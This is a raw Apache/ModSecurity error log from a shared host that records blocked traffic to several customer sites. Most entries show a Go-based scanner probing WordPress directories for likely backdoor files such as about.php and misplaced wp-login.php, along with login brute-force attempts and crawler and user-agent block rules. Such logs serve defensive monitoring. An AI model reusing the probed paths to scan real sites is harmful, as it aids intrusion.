[Tue May 26 20:02:14.561543 2026] [security2:error] [pid 113091:tid 113282] [client 103.163.220.41:58689] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/skins/lightgray/img/"] [unique_id "ahWu7qPxBGSmlFNOy6pFEgAAAlE"]
[Tue May 26 20:02:14.795901 2026] [security2:error] [pid 106517:tid 106773] [client 5.45.102.93:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWu7IZZc2DoU1lPnP12zAAA_yk"], referer: https://kingsclub.in/billiards
[Tue May 26 20:02:15.057765 2026] [security2:error] [pid 113091:tid 113345] [client 103.163.220.8:46947] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentytwo/assets/about.php"] [unique_id "ahWu76PxBGSmlFNOy6pFHAAAApA"]
[Tue May 26 20:02:15.436370 2026] [security2:error] [pid 106517:tid 106663] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu74ZZc2DoU1lPnP12_QAAAJI"]
[Tue May 26 20:02:15.560387 2026] [security2:error] [pid 113091:tid 113287] [client 103.163.220.22:27963] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/query-title/about.php"] [unique_id "ahWu76PxBGSmlFNOy6pFKgAAAlY"]
[Tue May 26 20:02:16.325936 2026] [security2:error] [pid 113091:tid 113248] [client 103.163.220.17:62537] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Requests/src/Exception/wp-login.php"] [unique_id "ahWu8KPxBGSmlFNOy6pFOgAAAi8"]
[Tue May 26 20:02:16.828582 2026] [security2:error] [pid 113091:tid 113225] [client 103.163.220.14:60973] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/rss/about.php"] [unique_id "ahWu8KPxBGSmlFNOy6pFSwAAAhg"]
[Tue May 26 20:02:17.732148 2026] [security2:error] [pid 106517:tid 106674] [client 103.163.220.11:38737] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sodium_compat/src/Core/wp-login.php"] [unique_id "ahWu8YZZc2DoU1lPnP13OwAAAJ0"]
[Tue May 26 20:02:17.799501 2026] [security2:error] [pid 113091:tid 113336] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu8aPxBGSmlFNOy6pFWgAAAoc"]
[Tue May 26 20:02:18.262794 2026] [security2:error] [pid 113091:tid 113328] [client 103.163.220.13:30151] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentytwo/templates/about.php"] [unique_id "ahWu8qPxBGSmlFNOy6pFcQAAAn8"]
[Tue May 26 20:02:18.763298 2026] [security2:error] [pid 106517:tid 106753] [client 103.163.220.45:48589] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/query-title/"] [unique_id "ahWu8oZZc2DoU1lPnP13TQAAAOs"]
[Tue May 26 20:02:18.995882 2026] [security2:error] [pid 106517:tid 106653] [client 192.42.116.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWu8oZZc2DoU1lPnP13UQAAiEM"], referer: https://kingsclub.in/blog
[Tue May 26 20:02:19.008127 2026] [security2:error] [pid 106517:tid 106728] [client 114.119.129.50:46497] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "jobs.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahWu84ZZc2DoU1lPnP13VQAAANI"]
[Tue May 26 20:02:19.509565 2026] [security2:error] [pid 113091:tid 113254] [client 103.163.220.32:53077] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sitemaps/wp-login.php"] [unique_id "ahWu86PxBGSmlFNOy6pFjQAAAjU"]
[Tue May 26 20:02:19.844081 2026] [security2:error] [pid 106517:tid 106720] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu84ZZc2DoU1lPnP13XwAAAMo"]
[Tue May 26 20:02:19.852344 2026] [security2:error] [pid 113091:tid 113104] [remote 46.20.146.46:37786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWu86PxBGSmlFNOy6pFmQACjww"]
[Tue May 26 20:02:20.061584 2026] [security2:error] [pid 106517:tid 106741] [client 103.163.220.37:43903] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/rss/"] [unique_id "ahWu9IZZc2DoU1lPnP13cQAAAN8"]
[Tue May 26 20:02:20.199763 2026] [security2:error] [pid 113091:tid 113199] [remote 46.20.146.46:37786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWu9KPxBGSmlFNOy6pFpwACZ2s"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 20:02:20.566352 2026] [security2:error] [pid 112029:tid 112228] [client 103.163.220.20:44437] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sodium_compat/src/Core/about.php"] [unique_id "ahWu9KFW0C-ajaCsyFdAkgAAAU8"]
[Tue May 26 20:02:21.408664 2026] [security2:error] [pid 112029:tid 112223] [client 103.163.220.46:53549] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/pullquote/wp-login.php"] [unique_id "ahWu9aFW0C-ajaCsyFdAnAAAAUo"]
[Tue May 26 20:02:21.922653 2026] [security2:error] [pid 112029:tid 112193] [client 103.163.220.46:52841] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/query-title/wp-login.php"] [unique_id "ahWu9aFW0C-ajaCsyFdArwAAASw"]
[Tue May 26 20:02:22.439817 2026] [security2:error] [pid 112029:tid 112170] [client 103.163.220.37:37835] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sitemaps/about.php"] [unique_id "ahWu9qFW0C-ajaCsyFdAxQAAARU"]
[Tue May 26 20:02:22.978358 2026] [security2:error] [pid 113091:tid 113314] [client 103.163.220.33:55011] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/query-pagination-previous/about.php"] [unique_id "ahWu9qPxBGSmlFNOy6pF2AAAAnE"]
[Tue May 26 20:02:23.094160 2026] [security2:error] [pid 106517:tid 106699] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu9oZZc2DoU1lPnP13iAAAALU"]
[Tue May 26 20:02:23.217439 2026] [security2:error] [pid 112029:tid 112251] [client 114.119.138.230:35289] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/author/techdc/page/7/"] [unique_id "ahWu96FW0C-ajaCsyFdAygAAAWY"], referer: https://preetishah.com/author/techdc/page/6
[Tue May 26 20:02:23.472940 2026] [security2:error] [pid 112029:tid 112246] [client 103.163.220.45:25063] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/comment-date/about.php"] [unique_id "ahWu96FW0C-ajaCsyFdAzwAAAWE"]
[Tue May 26 20:02:23.528218 2026] [security2:error] [pid 112029:tid 112185] [client 5.253.247.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWu96FW0C-ajaCsyFdAzgABJCk"], referer: https://kingsclub.in/cafe
[Tue May 26 20:02:24.335608 2026] [security2:error] [pid 112029:tid 112254] [client 103.163.220.7:56687] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/SimplePie/library/SimplePie/Parse/wp-login.php"] [unique_id "ahWu96FW0C-ajaCsyFdA1AAAAWk"]
[Tue May 26 20:02:24.871592 2026] [security2:error] [pid 106517:tid 106762] [client 103.163.220.37:24309] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/pullquote/about.php"] [unique_id "ahWu-IZZc2DoU1lPnP13qAAAAPQ"]
[Tue May 26 20:02:24.916264 2026] [security2:error] [pid 113091:tid 113215] [remote 222.165.190.235:34032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWu-KPxBGSmlFNOy6pGAgACQ3s"]
[Tue May 26 20:02:25.387358 2026] [security2:error] [pid 106517:tid 106702] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu-IZZc2DoU1lPnP13qgAAALg"]
[Tue May 26 20:02:25.392703 2026] [security2:error] [pid 113091:tid 113124] [remote 222.165.190.235:34032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWu-aPxBGSmlFNOy6pGDAACZiA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:02:25.469651 2026] [security2:error] [pid 106517:tid 106747] [client 103.163.220.36:58451] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/preformatted/about.php"] [unique_id "ahWu-YZZc2DoU1lPnP13wAAAAOU"]
[Tue May 26 20:02:25.963296 2026] [security2:error] [pid 112029:tid 112236] [client 103.163.220.50:30963] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sodium_compat/about.php"] [unique_id "ahWu-aFW0C-ajaCsyFdA6gAAAVc"]
[Tue May 26 20:02:26.462115 2026] [security2:error] [pid 112029:tid 112189] [client 103.163.220.49:61019] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/query-title/istsgd.php"] [unique_id "ahWu-qFW0C-ajaCsyFdA_AAAASg"]
[Tue May 26 20:02:26.962446 2026] [security2:error] [pid 113091:tid 113288] [client 103.125.146.81:35555] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/code/about.php"] [unique_id "ahWu-qPxBGSmlFNOy6pGLQAAAlc"]
[Tue May 26 20:02:27.697906 2026] [security2:error] [pid 113091:tid 113328] [client 5.253.247.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWu-6PxBGSmlFNOy6pGPQACfy8"], referer: https://kingsclub.in/careers
[Tue May 26 20:02:27.805453 2026] [security2:error] [pid 113091:tid 113299] [client 103.163.220.37:45893] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/social-links/wp-login.php"] [unique_id "ahWu-6PxBGSmlFNOy6pGPAAAAmI"]
[Tue May 26 20:02:27.848875 2026] [security2:error] [pid 113091:tid 113239] [client 2607:fea8:ff70:8047:8036:bdab:29b5:acde:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWu-6PxBGSmlFNOy6pGRgACJis"]
[Tue May 26 20:02:27.849607 2026] [security2:error] [pid 106517:tid 106765] [client 2607:fea8:ff70:8047:8036:bdab:29b5:acde:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWu-4ZZc2DoU1lPnP136gAA9z8"]
[Tue May 26 20:02:27.899422 2026] [security2:error] [pid 106517:tid 106718] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu-4ZZc2DoU1lPnP134gAAAMg"]
[Tue May 26 20:02:28.363297 2026] [security2:error] [pid 113091:tid 113225] [client 103.163.220.38:40207] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/SimplePie/library/SimplePie/Parse/about.php"] [unique_id "ahWu_KPxBGSmlFNOy6pGUwAAAhg"]
[Tue May 26 20:02:28.637044 2026] [core:error] [pid 106517:tid 106655] [client 107.150.120.129:49745] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 20:02:28.637065 2026] [core:error] [pid 106517:tid 106655] [client 107.150.120.129:49745] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 20:02:29.185794 2026] [security2:error] [pid 106517:tid 106778] [client 103.163.220.6:33873] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/preformatted/wp-login.php"] [unique_id "ahWu_IZZc2DoU1lPnP14AAAAAQQ"]
[Tue May 26 20:02:29.434429 2026] [security2:error] [pid 106517:tid 106687] [client 107.150.120.129:29510] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "webdisk.virgence.com"] [uri "/"] [unique_id "ahWu_YZZc2DoU1lPnP14GgAAAKk"]
[Tue May 26 20:02:29.680757 2026] [security2:error] [pid 106517:tid 106729] [client 103.163.220.42:43943] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentytwo/templates/"] [unique_id "ahWu_YZZc2DoU1lPnP14HgAAANM"]
[Tue May 26 20:02:29.765423 2026] [security2:error] [pid 106517:tid 106656] [client 66.249.64.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWu_YZZc2DoU1lPnP14IgAAAIs"]
[Tue May 26 20:02:29.767120 2026] [security2:error] [pid 106517:tid 106669] [client 66.249.64.96:38524] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWu_YZZc2DoU1lPnP14HQAAAJg"]
[Tue May 26 20:02:29.776370 2026] [security2:error] [pid 106517:tid 106711] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu_YZZc2DoU1lPnP14FAAAAME"]
[Tue May 26 20:02:30.178327 2026] [security2:error] [pid 112029:tid 112166] [client 103.125.146.82:63203] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/social-links/"] [unique_id "ahWu_qFW0C-ajaCsyFdBFQAAARE"]
[Tue May 26 20:02:30.686384 2026] [security2:error] [pid 106517:tid 106772] [client 103.163.220.8:33903] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/query-pagination-previous/"] [unique_id "ahWu_oZZc2DoU1lPnP14OQAAAP4"]
[Tue May 26 20:02:31.146202 2026] [security2:error] [pid 106517:tid 106704] [client 146.174.166.76:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu_oZZc2DoU1lPnP14OwAAALo"]
[Tue May 26 20:02:31.181454 2026] [security2:error] [pid 112029:tid 112221] [client 103.163.220.37:50195] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/SimplePie/library/SimplePie/Parse/"] [unique_id "ahWu_6FW0C-ajaCsyFdBJwAAAUg"]
[Tue May 26 20:02:31.219529 2026] [security2:error] [pid 112029:tid 112261] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWu_6FW0C-ajaCsyFdBKAAAAXA"]
[Tue May 26 20:02:31.219949 2026] [security2:error] [pid 106517:tid 106714] [client 66.249.64.110:37351] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWu_4ZZc2DoU1lPnP14SQAAAMQ"]
[Tue May 26 20:02:31.689096 2026] [security2:error] [pid 112029:tid 112216] [client 103.163.220.50:22271] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/social-links/about.php"] [unique_id "ahWu_6FW0C-ajaCsyFdBLwAAAUM"]
[Tue May 26 20:02:32.174732 2026] [security2:error] [pid 106517:tid 106554] [remote 78.142.18.172:38662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWu_4ZZc2DoU1lPnP14XwAAyiI"]
[Tue May 26 20:02:32.180747 2026] [security2:error] [pid 106517:tid 106740] [client 103.163.220.40:28373] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/dist/script-modules/block-library/search/about.php"] [unique_id "ahWvAIZZc2DoU1lPnP14ZQAAAN4"]
[Tue May 26 20:02:32.304918 2026] [security2:error] [pid 112029:tid 112073] [remote 153.127.19.115:33686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.19.127.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvAKFW0C-ajaCsyFdBMgABfys"]
[Tue May 26 20:02:32.515554 2026] [security2:error] [pid 106517:tid 106699] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvAIZZc2DoU1lPnP14ZAAAALU"]
[Tue May 26 20:02:32.568657 2026] [security2:error] [pid 106517:tid 106670] [client 192.42.116.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvAIZZc2DoU1lPnP14bwAAmRc"], referer: https://kingsclub.in/club-membership
[Tue May 26 20:02:32.669753 2026] [security2:error] [pid 106517:tid 106741] [client 103.163.220.22:21131] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/class-wp-site-edit.php"] [unique_id "ahWvAIZZc2DoU1lPnP14egAAAN8"]
[Tue May 26 20:02:32.835911 2026] [security2:error] [pid 106517:tid 106674] [client 102.164.188.174:18840] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/compta/bank/various_payment/card.php"] [unique_id "ahWvAIZZc2DoU1lPnP14cgAAnVM"], referer: https://erp.azurmediatec.com/compta/bank/various_payment/card.php?id=297&action=clone
